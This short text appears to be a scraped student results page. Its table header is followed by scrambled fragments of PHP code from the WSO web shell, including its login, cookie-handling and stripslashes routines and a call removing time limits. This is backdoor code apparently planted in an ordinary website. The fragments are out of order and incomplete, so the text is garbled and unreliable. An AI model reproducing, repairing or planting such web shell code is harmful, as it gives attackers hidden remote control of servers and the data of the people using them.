Student Name Roll No. Reg. No Course Name Gread Point
}
wsoLogin();
if(!empty($auth_pass)) {
}
setcookie($k
$_COOKIE[$k] = $v;
function WSOsetcookie($k
}
0
function wsoLogin() {
}
$_COOKIE = WSOstripslashes($_COOKIE);
$_POST = WSOstripslashes($_POST);
}
function WSOstripslashes($array) {
if(get_magic_quotes_gpc()) {
@set_magic_quotes_runtime(0);
@set_time_limit(0);
}
}